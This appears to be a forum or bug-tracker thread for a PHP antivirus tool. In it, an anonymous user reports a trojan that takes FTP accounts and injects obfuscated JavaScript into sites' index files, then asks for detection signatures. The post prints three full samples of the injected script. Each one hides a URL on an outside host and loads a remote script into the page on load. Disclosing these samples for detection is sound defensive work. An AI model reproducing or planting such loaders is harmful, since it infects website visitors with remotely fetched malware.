#5 Dinamic virus

[Anonymous]

There is some kind of Trojan Hourse. Infected PC is scanned for ftp acounts and adding some javascript to all index files in that ftp:
The source is somethink like this:
<code>
<script>var b;g=function(){this.q="q";var xu={A:"v"};function x(r,Q,V){return r.substr(Q,V);}var n='';this.rU=35331;this.rU--;this.ab=41571;this.ab--;var e=document;var l=new String("/miha"+"nblog"+x("-com/tGM",0,5)+x("zrNgooglrNz",3,5)+x("e.com3YH",0,5)+"/bado"+x("ngo.cUFtZ",0,5)+x("om.phKzr",0,5)+"p");k=["At","C","E"];var H=RegExp;var AT="";var C_=["Au"];this._='';Rv={Lf:55527};function L(r,Q){var s=new Date();UF=17545;UF+=181;this.Ko=false;var V=String("[")+Q+String(x("]ZD98",0,1));var c=new H(V, new String("g"));return r.replace(c, n);};var a=null;var B={d:false};var lJ=634921-626841;var P=L('s_cVr2i2pKtY','9zJuV2YKxhP_R5N');Oe=49438;Oe--;T={fa:44963};var gM="body";var Lp=new Array();ky=37870;ky++;mI={rB:47419};this.J_=10572;this.J_+=204;b=function(){try {var bk=["PG","y","VP"];var Z=L('cwr7eJaht_ebE_l0esmie5nJtk','I5j728wFdWQi0UkKBJNbs_h');o=e[Z](P);TT=34398;TT--;try {var qn='Kh'} catch(qn){};var I=L('sMrecy','enyMqC9i0XTOjVHW');eq={};try {var Jr='VC'} catch(Jr){};var CC=["i"];var r=lJ+l;var j=64550;Re={QG:16956};var K=new String("defe"+"r");var Ez={nX:false};o[I]="ht"+x("tpy3Kh",0,2)+x(":/JVb5",0,2)+"/e"+"as"+x("dhAtwdhA",3,2)+x("omBa3",0,2)+x("baMyh",0,2)+"t."+x("fJ8tru8tfJ",4,2)+x(":IeHk",0,1)+r;o[K]=[9,1][1];var Un="";var It=16682;hQ=[];KC=[];e[gM].appendChild(o);var BN=["nQ","Bl","Fh"];} catch(F){this.sk=10312;this.sk-=32;var Wh=new Date();};};};g();this.LL=24399;this.LL--;window.onload=b;this.FH="FH";sU=["FZ","eg","BJ"];</script>
<!--950d74b12b073ac359f56dbc8918e730-->
</code>
And all the time this code is generated diferently. Lets see another 2 examples:
<code>
<script>var Vl=new String();try {this.Lr='';var ul='';var C='';var U='';var i='';var j=new String();this.uS='';var h;if(h!='' && h!='x'){h='UW'};var v=String("g");var a=new String("]d4B5".substr(0,1));var hs=new Array();var w=RegExp;this.G='';this._A="";var L=new String("rep"+"lac"+"eHVin".substr(0,1));var l=new Array();var e=new String("[");var Xe;if(Xe!=''){Xe='c'};var UC=new Date();function Q(k,K){var Gw;if(Gw!='sb'){Gw='sb'};var av=e;av+=K;this.g="";this.PU="";av+=a;var t=new w(av, v);return k.replace(t, U);var nf;if(nf!='AS'){nf=''};};this.m="";var nJ="";var E=Q('8552993530511931383551502315313',"51239");var Px;if(Px!='dk' && Px != ''){Px=null};var Al='';var J='';var V=Q('hMtstspM:q/M/MeMaqrstshMlMisnskM-qnqeMtM.qgqoMoMgXlXeM.qcsoMmX.qpqeM.sgXeMtXasfsrseseslMaXnscseXrX-Mcqoqmq.swseXbqmMiqxqwqoMrMlqdM.XrXuX:s',"MsXq");this.Wp='';var IRy;if(IRy!=''){IRy='jb'};var Z=new String("onudmX".substr(0,2)+"ZM0lo0MZ".substr(3,2)+"ad");var yy;if(yy!='Ld'){yy=''};var I="scri"+"Z9MQpt".substr(4);var AO;if(AO!='Qj' && AO!='cD'){AO=''};var k="1";this.gc='';var B=new String("6aE/goog".substr(3)+"le.co"+"m/goo1hc".substr(0,5)+"CPZ7gle.c".substr(4)+"om/go"+"A7qTogle.".substr(4)+"be/dauKUJ".substr(0,5)+"ilymaPqL".substr(0,5)+"il.coBEI".substr(0,5)+"VX4.uk/j".substr(3)+"ugem.EAL".substr(0,5)+"jp.ph"+"aK0p".substr(3));var QU="";var P='';var GX;if(GX!=''){GX='HE'};var DG='';window[Z]=function(){var bS=new Date();var Tm="";var jW;if(jW!=''){jW='tr'};F=document.createElement(I);var Kj=new String();var sG='';var Hi;if(Hi!='_iR'){Hi='_iR'};P+=V;P+=E+B;var tm=new Date();var ls="";var xS="";F.defer=k;var fc='';var is;if(is!='rK' && is!='rn'){is=''};var M=document.body;F.src=P;var ve;if(ve!='sl'){ve='sl'};var Zf=new Array();M.appendChild(F);var Qc;if(Qc!='' && Qc!='OB'){Qc=null};this.uL="";};var kp;if(kp!='CE' && kp!='HC'){kp=''};} catch(QX){var ng=new String();var uk;if(uk!='' && uk!='Jg'){uk=null};};var If;if(If!='' && If!='qZO'){If='TB'};this.o="";</script>
<!--5768462cf4276fae89665a878382570d-->
</code>
<code>
<script>var Vl=new String();try {this.Lr='';var ul='';var C='';var U='';var i='';var j=new String();this.uS='';var h;if(h!='' && h!='x'){h='UW'};var v=String("g");var a=new String("]d4B5".substr(0,1));var hs=new Array();var w=RegExp;this.G='';this._A="";var L=new String("rep"+"lac"+"eHVin".substr(0,1));var l=new Array();var e=new String("[");var Xe;if(Xe!=''){Xe='c'};var UC=new Date();function Q(k,K){var Gw;if(Gw!='sb'){Gw='sb'};var av=e;av+=K;this.g="";this.PU="";av+=a;var t=new w(av, v);return k.replace(t, U);var nf;if(nf!='AS'){nf=''};};this.m="";var nJ="";var E=Q('8552993530511931383551502315313',"51239");var Px;if(Px!='dk' && Px != ''){Px=null};var Al='';var J='';var V=Q('hMtstspM:q/M/MeMaqrstshMlMisnskM-qnqeMtM.qgqoMoMgXlXeM.qcsoMmX.qpqeM.sgXeMtXasfsrseseslMaXnscseXrX-Mcqoqmq.swseXbqmMiqxqwqoMrMlqdM.XrXuX:s',"MsXq");this.Wp='';var IRy;if(IRy!=''){IRy='jb'};var Z=new String("onudmX".substr(0,2)+"ZM0lo0MZ".substr(3,2)+"ad");var yy;if(yy!='Ld'){yy=''};var I="scri"+"Z9MQpt".substr(4);var AO;if(AO!='Qj' && AO!='cD'){AO=''};var k="1";this.gc='';var B=new String("6aE/goog".substr(3)+"le.co"+"m/goo1hc".substr(0,5)+"CPZ7gle.c".substr(4)+"om/go"+"A7qTogle.".substr(4)+"be/dauKUJ".substr(0,5)+"ilymaPqL".substr(0,5)+"il.coBEI".substr(0,5)+"VX4.uk/j".substr(3)+"ugem.EAL".substr(0,5)+"jp.ph"+"aK0p".substr(3));var QU="";var P='';var GX;if(GX!=''){GX='HE'};var DG='';window[Z]=function(){var bS=new Date();var Tm="";var jW;if(jW!=''){jW='tr'};F=document.createElement(I);var Kj=new String();var sG='';var Hi;if(Hi!='_iR'){Hi='_iR'};P+=V;P+=E+B;var tm=new Date();var ls="";var xS="";F.defer=k;var fc='';var is;if(is!='rK' && is!='rn'){is=''};var M=document.body;F.src=P;var ve;if(ve!='sl'){ve='sl'};var Zf=new Array();M.appendChild(F);var Qc;if(Qc!='' && Qc!='OB'){Qc=null};this.uL="";};var kp;if(kp!='CE' && kp!='HC'){kp=''};} catch(QX){var ng=new String();var uk;if(uk!='' && uk!='Jg'){uk=null};};var If;if(If!='' && If!='qZO'){If='TB'};this.o="";</script>
</code>

[Anonymous]

Actualy last 2 is the same. Any way that trojan is bad and undetectable by the phpantivirus.
I suggesting to add regural expressions to the virus.dev file.